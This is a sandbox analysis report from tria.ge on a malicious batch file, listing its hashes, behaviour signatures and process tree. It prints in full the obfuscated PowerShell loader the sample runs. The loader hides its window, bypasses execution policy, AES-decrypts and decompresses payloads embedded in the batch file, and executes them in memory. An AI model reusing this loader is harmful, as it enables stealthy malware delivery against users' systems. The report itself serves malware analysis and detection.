Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
11/05/2024, 00:52
Static task
static1
Behavioral task
behavioral1
Sample
Client-built (2).bat
Resource
win7-20240221-en
4 signatures
150 seconds
General
-
Target
Client-built (2).bat
-
Size
1.6MB
-
MD5
da7beeb28254ec3bb319060398c5818a
-
SHA1
99378e5615053698c3adcd02732389dc71d2b2eb
-
SHA256
d515f6ca3e692713a94fe4066bbba25b4d6157af0606ca17bde5c0d4f3a6e02b
-
SHA512
7d6322396e8ecbe5e3303dd96cc1a396037d2f7d47b50714725b1138f4fc650b0ccfa1a43dd233703a860c1109a21eba527a1714319f4a08bf1a23d4b9c4a0b2
-
SSDEEP
24576:W0aS2MAjGvh1FiDkgGi2P6xE/NPe+JXe5PRnr1uyQAI9elDqYemJe+RTeteMuSdb:NaeAjWFb/gEYtX0FmhRpTj0
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2212 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2212 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2320 wrote to memory of 2212 2320 cmd.exe 29 PID 2320 wrote to memory of 2212 2320 cmd.exe 29 PID 2320 wrote to memory of 2212 2320 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built (2).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Fulx5naUxxJC4PEh/asEOXXmfMdH8rl9wkrrsuGUwkE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X+M2T7L88iDz+qwc/2xk3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vHkOv=New-Object System.IO.MemoryStream(,$param_var); $cMQor=New-Object System.IO.MemoryStream; $hCTUY=New-Object System.IO.Compression.GZipStream($vHkOv, [IO.Compression.CompressionMode]::Decompress); $hCTUY.CopyTo($cMQor); $hCTUY.Dispose(); $vHkOv.Dispose(); $cMQor.Dispose(); $cMQor.ToArray();}function execute_function($param_var,$param2_var){ $KPBbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zVfPe=$KPBbX.EntryPoint; $zVfPe.Invoke($null, $param2_var);}$VnwnK = 'C:\Users\Admin\AppData\Local\Temp\Client-built (2).bat';$host.UI.RawUI.WindowTitle = $VnwnK;$HPJZc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VnwnK).Split([Environment]::NewLine);foreach ($kTnXf in $HPJZc) { if ($kTnXf.StartsWith(':: ')) { $GNmwQ=$kTnXf.Substring(3); break; }}$payloads_var=[string[]]$GNmwQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
-